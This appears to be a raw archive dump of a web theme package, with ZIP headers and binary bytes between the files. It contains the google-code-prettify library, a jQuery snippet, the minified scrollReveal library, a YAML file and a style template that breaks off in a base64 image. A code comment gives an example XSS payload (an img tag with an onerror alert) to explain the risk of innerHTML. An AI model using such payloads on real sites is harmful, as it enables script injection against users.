   * @param opt_langExtension {string} The language name to use.
   *     Typically, a filename extension like 'cpp' or 'java'.
   * @param opt_numberLines {number|boolean} True to number lines,
   *     or the 1-indexed number of the first line in sourceCodeHtml.
   */
  function $prettyPrintOne(sourceCodeHtml, opt_langExtension, opt_numberLines) {
    /** @type{number|boolean} */
    var nl = opt_numberLines || false;
    /** @type{string|null} */
    var langExtension = opt_langExtension || null;
    /** @type{!Element} */
    var container = document.createElement('div');
    // This could cause images to load and onload listeners to fire.
    // E.g. <img onerror="alert(1337)" src="nosuchimage.png">.
    // We assume that the inner HTML is from a trusted source.
    // The pre-tag is required for IE8 which strips newlines from innerHTML
    // when it is injected into a <pre> tag.
    // http://stackoverflow.com/questions/451486/pre-tag-loses-line-breaks-when-setting-innerhtml-in-ie
    // http://stackoverflow.com/questions/195363/inserting-a-newline-into-a-pre-tag-ie-javascript
    container.innerHTML = '<pre>' + sourceCodeHtml + '</pre>';
    container = /** @type{!Element} */(container.firstChild);
    if (nl) {
      numberLines(container, nl, true);
    }

    /** @type{JobT} */
    var job = {
      langExtension: langExtension,
      numberLines: nl,
      sourceNode: container,
      pre: 1,
      sourceCode: null,
      basePos: null,
      spans: null,
      decorations: null
    };
    applyDecorator(job);
    return container.innerHTML;
  }

   /**
    * Find all the {@code <pre>} and {@code <code>} tags in the DOM with
    * {@code class=prettyprint} and prettify them.
    *
    * @param {Function} opt_whenDone called when prettifying is done.
    * @param {HTMLElement|HTMLDocument} opt_root an element or document
    *   containing all the elements to pretty print.
    *   Defaults to {@code document.body}.
    */
  function $prettyPrint(opt_whenDone, opt_root) {
    var root = opt_root || document.body;
    var doc = root.ownerDocument || document;
    function byTagName(tn) { return root.getElementsByTagName(tn); }
    // fetch a list of nodes to rewrite
    var codeSegments = [byTagName('pre'), byTagName('code'), byTagName('xmp')];
    var elements = [];
    for (var i = 0; i < codeSegments.length; ++i) {
      for (var j = 0, n = codeSegments[i].length; j < n; ++j) {
        elements.push(codeSegments[i][j]);
      }
    }
    codeSegments = null;

    var clock = Date;
    if (!clock['now']) {
      clock = { 'now': function () { return +(new Date); } };
    }

    // The loop is broken into a series of continuations to make sure that we
    // don't make the browser unresponsive when rewriting a large page.
    var k = 0;

    var langExtensionRe = /\blang(?:uage)?-([\w.]+)(?!\S)/;
    var prettyPrintRe = /\bprettyprint\b/;
    var prettyPrintedRe = /\bprettyprinted\b/;
    var preformattedTagNameRe = /pre|xmp/i;
    var codeRe = /^code$/i;
    var preCodeXmpRe = /^(?:pre|code|xmp)$/i;
    var EMPTY = {};

    function doWork() {
      var endTime = (win['PR_SHOULD_USE_CONTINUATION'] ?
                     clock['now']() + 250 /* ms */ :
                     Infinity);
      for (; k < elements.length && clock['now']() < endTime; k++) {
        var cs = elements[k];

        // Look for a preceding comment like
        // <?prettify lang="..." linenums="..."?>
        var attrs = EMPTY;
        {
          for (var preceder = cs; (preceder = preceder.previousSibling);) {
            var nt = preceder.nodeType;
            // <?foo?> is parsed by HTML 5 to a comment node (8)
            // like <!--?foo?-->, but in XML is a processing instruction
            var value = (nt === 7 || nt === 8) && preceder.nodeValue;
            if (value
                ? !/^\??prettify\b/.test(value)
                : (nt !== 3 || /\S/.test(preceder.nodeValue))) {
              // Skip over white-space text nodes but not others.
              break;
            }
            if (value) {
              attrs = {};
              value.replace(
                  /\b(\w+)=([\w:.%+-]+)/g,
                function (_, name, value) { attrs[name] = value; });
              break;
            }
          }
        }

        var className = cs.className;
        if ((attrs !== EMPTY || prettyPrintRe.test(className))
            // Don't redo this if we've already done it.
            // This allows recalling pretty print to just prettyprint elements
            // that have been added to the page since last call.
            && !prettyPrintedRe.test(className)) {

          // make sure this is not nested in an already prettified element
          var nested = false;
          for (var p = cs.parentNode; p; p = p.parentNode) {
            var tn = p.tagName;
            if (preCodeXmpRe.test(tn)
                && p.className && prettyPrintRe.test(p.className)) {
              nested = true;
              break;
            }
          }
          if (!nested) {
            // Mark done.  If we fail to prettyprint for whatever reason,
            // we shouldn't try again.
            cs.className += ' prettyprinted';

            // If the classes includes a language extensions, use it.
            // Language extensions can be specified like
            //     <pre class="prettyprint lang-cpp">
            // the language extension "cpp" is used to find a language handler
            // as passed to PR.registerLangHandler.
            // HTML5 recommends that a language be specified using "language-"
            // as the prefix instead.  Google Code Prettify supports both.
            // http://dev.w3.org/html5/spec-author-view/the-code-element.html
            var langExtension = attrs['lang'];
            if (!langExtension) {
              langExtension = className.match(langExtensionRe);
              // Support <pre class="prettyprint"><code class="language-c">
              var wrapper;
              if (!langExtension && (wrapper = childContentWrapper(cs))
                  && codeRe.test(wrapper.tagName)) {
                langExtension = wrapper.className.match(langExtensionRe);
              }

              if (langExtension) { langExtension = langExtension[1]; }
            }

            var preformatted;
            if (preformattedTagNameRe.test(cs.tagName)) {
              preformatted = 1;
            } else {
              var currentStyle = cs['currentStyle'];
              var defaultView = doc.defaultView;
              var whitespace = (
                  currentStyle
                  ? currentStyle['whiteSpace']
                  : (defaultView
                     && defaultView.getComputedStyle)
                  ? defaultView.getComputedStyle(cs, null)
                  .getPropertyValue('white-space')
                  : 0);
              preformatted = whitespace
                  && 'pre' === whitespace.substring(0, 3);
            }

            // Look for a class like linenums or linenums:<n> where <n> is the
            // 1-indexed number of the first line.
            var lineNums = attrs['linenums'];
            if (!(lineNums = lineNums === 'true' || +lineNums)) {
              lineNums = className.match(/\blinenums\b(?::(\d+))?/);
              lineNums =
                lineNums
                ? lineNums[1] && lineNums[1].length
                  ? +lineNums[1] : true
                : false;
            }
            if (lineNums) { numberLines(cs, lineNums, preformatted); }

            // do the pretty printing
            var prettyPrintingJob = {
              langExtension: langExtension,
              sourceNode: cs,
              numberLines: lineNums,
              pre: preformatted,
              sourceCode: null,
              basePos: null,
              spans: null,
              decorations: null
            };
            applyDecorator(prettyPrintingJob);
          }
        }
      }
      if (k < elements.length) {
        // finish up in a continuation
        win.setTimeout(doWork, 250);
      } else if ('function' === typeof opt_whenDone) {
        opt_whenDone();
      }
    }

    doWork();
  }

  /**
   * Contains functions for creating and registering new language handlers.
   * @type {Object}
   */
  var PR = win['PR'] = {
        'createSimpleLexer': createSimpleLexer,
        'registerLangHandler': registerLangHandler,
        'sourceDecorator': sourceDecorator,
        'PR_ATTRIB_NAME': PR_ATTRIB_NAME,
        'PR_ATTRIB_VALUE': PR_ATTRIB_VALUE,
        'PR_COMMENT': PR_COMMENT,
        'PR_DECLARATION': PR_DECLARATION,
        'PR_KEYWORD': PR_KEYWORD,
        'PR_LITERAL': PR_LITERAL,
        'PR_NOCODE': PR_NOCODE,
        'PR_PLAIN': PR_PLAIN,
        'PR_PUNCTUATION': PR_PUNCTUATION,
        'PR_SOURCE': PR_SOURCE,
        'PR_STRING': PR_STRING,
        'PR_TAG': PR_TAG,
        'PR_TYPE': PR_TYPE,
        'prettyPrintOne':
           IN_GLOBAL_SCOPE
             ? (win['prettyPrintOne'] = $prettyPrintOne)
             : (prettyPrintOne = $prettyPrintOne),
        'prettyPrint': prettyPrint =
           IN_GLOBAL_SCOPE
             ? (win['prettyPrint'] = $prettyPrint)
             : (prettyPrint = $prettyPrint)
      };

  // Make PR available via the Asynchronous Module Definition (AMD) API.
  // Per https://github.com/amdjs/amdjs-api/wiki/AMD:
  // The Asynchronous Module Definition (AMD) API specifies a
  // mechanism for defining modules such that the module and its
  // dependencies can be asynchronously loaded.
  // ...
  // To allow a clear indicator that a global define function (as
  // needed for script src browser loading) conforms to the AMD API,
  // any global define function SHOULD have a property called "amd"
  // whose value is an object. This helps avoid conflict with any
  // other existing JavaScript code that could have defined a define()
  // function that does not conform to the AMD API.
  var define = win['define'];
  if (typeof define === "function" && define['amd']) {
    define("google-code-prettify", [], function () {
      return PR;
    });
  }
})();
PK!'��T��it_sanctum/js/template.jsnu&1i�(function($) {
	// Move the Offcanvas Toggle button in the Header
	$(document).ready(function() {
		$("div.g-offcanvas-toggle:not(.offcanvas-toggle-particle)").prependTo($("#g-navigation"));
	});
})(jQuery);PK!��pt!t!!it_sanctum/js/scrollReveal.min.jsnu&1i�!function(e,t){"function"==typeof define&&define.amd?define(t):"object"==typeof exports?module.exports=t(require,exports,module):e.scrollReveal=t()}(this,function(){return window.scrollReveal=function(e){"use strict";function t(i){return this instanceof t?(r=this,r.elems={},r.serial=1,r.blocked=!1,r.config=o(r.defaults,i),r.isMobile()&&!r.config.mobile||!r.isSupported()?void r.destroy():(r.config.viewport===e.document.documentElement?(e.addEventListener("scroll",a,!1),e.addEventListener("resize",a,!1)):r.config.viewport.addEventListener("scroll",a,!1),void r.init(!0))):new t(i)}var i,o,a,r;return t.prototype={defaults:{enter:"bottom",move:"8px",over:"0.6s",wait:"0s",easing:"ease",scale:{direction:"up",power:"5%"},rotate:{x:0,y:0,z:0},opacity:0,mobile:!1,reset:!1,viewport:e.document.documentElement,delay:"once",vFactor:.6,complete:function(){}},init:function(e){var t,i,o;o=Array.prototype.slice.call(r.config.viewport.querySelectorAll("[data-sr]")),o.forEach(function(e){t=r.serial++,i=r.elems[t]={domEl:e},i.config=r.configFactory(i),i.styles=r.styleFactory(i),i.seen=!1,e.removeAttribute("data-sr"),e.setAttribute("style",i.styles.inline+i.styles.initial)}),r.scrolled=r.scrollY(),r.animate(e)},animate:function(e){function t(e){var t=r.elems[e];setTimeout(function(){t.domEl.setAttribute("style",t.styles.inline),t.config.complete(t.domEl),delete r.elems[e]},t.styles.duration)}var i,o,a;for(i in r.elems)r.elems.hasOwnProperty(i)&&(o=r.elems[i],a=r.isElemInViewport(o),a?("always"===r.config.delay||"onload"===r.config.delay&&e||"once"===r.config.delay&&!o.seen?o.domEl.setAttribute("style",o.styles.inline+o.styles.target+o.styles.transition):o.domEl.setAttribute("style",o.styles.inline+o.styles.target+o.styles.reset),o.seen=!0,o.config.reset||o.animating||(o.animating=!0,t(i))):!a&&o.config.reset&&o.domEl.setAttribute("style",o.styles.inline+o.styles.initial+o.styles.reset));r.blocked=!1},configFactory:function(e){var t={},i={},a=e.domEl.getAttribute("data-sr").split(/[, ]+/);return a.forEach(function(e,i){switch(e){case"enter":t.enter=a[i+1];break;case"wait":t.wait=a[i+1];break;case"move":t.move=a[i+1];break;case"ease":t.move=a[i+1],t.ease="ease";break;case"ease-in":if("up"==a[i+1]||"down"==a[i+1]){t.scale.direction=a[i+1],t.scale.power=a[i+2],t.easing="ease-in";break}t.move=a[i+1],t.easing="ease-in";break;case"ease-in-out":if("up"==a[i+1]||"down"==a[i+1]){t.scale.direction=a[i+1],t.scale.power=a[i+2],t.easing="ease-in-out";break}t.move=a[i+1],t.easing="ease-in-out";break;case"ease-out":if("up"==a[i+1]||"down"==a[i+1]){t.scale.direction=a[i+1],t.scale.power=a[i+2],t.easing="ease-out";break}t.move=a[i+1],t.easing="ease-out";break;case"hustle":if("up"==a[i+1]||"down"==a[i+1]){t.scale.direction=a[i+1],t.scale.power=a[i+2],t.easing="cubic-bezier( 0.6, 0.2, 0.1, 1 )";break}t.move=a[i+1],t.easing="cubic-bezier( 0.6, 0.2, 0.1, 1 )";break;case"over":t.over=a[i+1];break;case"flip":case"pitch":t.rotate=t.rotate||{},t.rotate.x=a[i+1];break;case"spin":case"yaw":t.rotate=t.rotate||{},t.rotate.y=a[i+1];break;case"roll":t.rotate=t.rotate||{},t.rotate.z=a[i+1];break;case"reset":t.reset="no"==a[i-1]?!1:!0;break;case"scale":if(t.scale={},"up"==a[i+1]||"down"==a[i+1]){t.scale.direction=a[i+1],t.scale.power=a[i+2];break}t.scale.power=a[i+1];break;case"vFactor":case"vF":t.vFactor=a[i+1];break;case"opacity":t.opacity=a[i+1];break;default:return}}),i=o(i,r.config),i=o(i,t),"top"===i.enter||"bottom"===i.enter?i.axis="Y":("left"===i.enter||"right"===i.enter)&&(i.axis="X"),("top"===i.enter||"left"===i.enter)&&(i.move="-"+i.move),i},styleFactory:function(e){function t(){0!==parseInt(s.move)&&(o+=" translate"+s.axis+"("+s.move+")",r+=" translate"+s.axis+"(0)"),0!==parseInt(s.scale.power)&&("up"===s.scale.direction?s.scale.value=1-.01*parseFloat(s.scale.power):"down"===s.scale.direction&&(s.scale.value=1+.01*parseFloat(s.scale.power)),o+=" scale("+s.scale.value+")",r+=" scale(1)"),s.rotate.x&&(o+=" rotateX("+s.rotate.x+")",r+=" rotateX(0)"),s.rotate.y&&(o+=" rotateY("+s.rotate.y+")",r+=" rotateY(0)"),s.rotate.z&&(o+=" rotateZ("+s.rotate.z+")",r+=" rotateZ(0)"),o+="; opacity: "+s.opacity+"; ",r+="; opacity: 1; "}var i,o,a,r,n,s=e.config,c=1e3*(parseFloat(s.over)+parseFloat(s.wait));return i=e.domEl.getAttribute("style")?e.domEl.getAttribute("style")+"; visibility: visible; ":"visibility: visible; ",n="-webkit-transition: -webkit-transform "+s.over+" "+s.easing+" "+s.wait+", opacity "+s.over+" "+s.easing+" "+s.wait+"; transition: transform "+s.over+" "+s.easing+" "+s.wait+", opacity "+s.over+" "+s.easing+" "+s.wait+"; -webkit-perspective: 1000;-webkit-backface-visibility: hidden;",a="-webkit-transition: -webkit-transform "+s.over+" "+s.easing+" 0s, opacity "+s.over+" "+s.easing+" 0s; transition: transform "+s.over+" "+s.easing+" 0s, opacity "+s.over+" "+s.easing+" 0s; -webkit-perspective: 1000; -webkit-backface-visibility: hidden; ",o="transform:",r="transform:",t(),o+="-webkit-transform:",r+="-webkit-transform:",t(),{transition:n,initial:o,target:r,reset:a,inline:i,duration:c}},getViewportH:function(){var t=r.config.viewport.clientHeight,i=e.innerHeight;return r.config.viewport===e.document.documentElement&&i>t?i:t},scrollY:function(){return r.config.viewport===e.document.documentElement?e.pageYOffset:r.config.viewport.scrollTop+r.config.viewport.offsetTop},getOffset:function(e){var t=0,i=0;do isNaN(e.offsetTop)||(t+=e.offsetTop),isNaN(e.offsetLeft)||(i+=e.offsetLeft);while(e=e.offsetParent);return{top:t,left:i}},isElemInViewport:function(t){function i(){var e=n+a*c,t=s-a*c,i=r.scrolled+r.getViewportH(),o=r.scrolled;return i>e&&t>o}function o(){var i=t.domEl,o=i.currentStyle||e.getComputedStyle(i,null);return"fixed"===o.position}var a=t.domEl.offsetHeight,n=r.getOffset(t.domEl).top,s=n+a,c=t.config.vFactor||0;return i()||o()},isMobile:function(){var t=navigator.userAgent||navigator.vendor||e.opera;return/(ipad|playbook|silk|android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(t)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(t.substr(0,4))?!0:!1},isSupported:function(){for(var e=document.createElement("sensor"),t="Webkit,Moz,O,".split(","),i=("transition "+t.join("transition,")).split(","),o=0;o<i.length;o++)if(""===!e.style[i[o]])return!1;return!0},destroy:function(){var e=r.config.viewport,t=Array.prototype.slice.call(e.querySelectorAll("[data-sr]"));t.forEach(function(e){e.removeAttribute("data-sr")})}},a=function(){r.blocked||(r.blocked=!0,r.scrolled=r.scrollY(),i(function(){r.animate()}))},o=function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i]);return e},i=function(){return e.requestAnimationFrame||e.webkitRequestAnimationFrame||e.mozRequestAnimationFrame||function(t){e.setTimeout(t,1e3/60)}}(),t}(window),scrollReveal});PK!�#�L,, it_sanctum/install/outlines.yamlnu&1i�default:
  title: Default
  preset: default
PK!k������,it_sanctum/install/templates/style.html.twignu&1i�<style>
    .g5i h1 {
        color: white;
        background: rgba(0, 0, 0, 0.3);
        padding: 1rem;
        text-align: center;
        left: 50%;
        position: relative;
        margin: 1rem -0.5rem 0;
        transform: translateX(-50%);
        line-height: 1.5;
        border-top: 1px solid rgba(0, 0, 0, 0.1);
    }

    .g5i p {
        font-size: 1rem;
        color: white;
        margin: 1rem 10%;
        text-shadow: 0 0 9px black;
        text-align: center;
        background: rgba(0, 0, 0, 0.1);
        padding: 0.5rem;
        border-radius: 3px;
        line-height: 1.5;
    }

    .g5i .g5-info {
        display: block;
        font-size: 1rem;
        font-weight: normal;
    }

    .g5i .g5-actions {
        text-align: center;
        border-top: 1px solid rgba(255, 255, 255, 0.1);
        padding: 1rem;
    }

    .g5i .g5-button {
        display: inline-block;
        font-size: 1rem;
        color: white;
        border: 2px solid rgba(255, 255, 255, 0.8);
        border-radius: 3px;
        padding: 0.5rem 1rem;
        background: rgba(82, 195, 255, 0.1);
        vertical-align: middle;
        transition: background .2s;
        text-decoration: none;
    }

    .g5i .g5-button:hover {
        background-color: rgba(255, 255, 255, 0.2);
        transition: background .2s;
    }

    .g5i .g5-icon {
        line-height: 11px;
        vertical-align: middle;
    }

    .g5i .g5-rockettheme {
        background: url('data:image/png;base64,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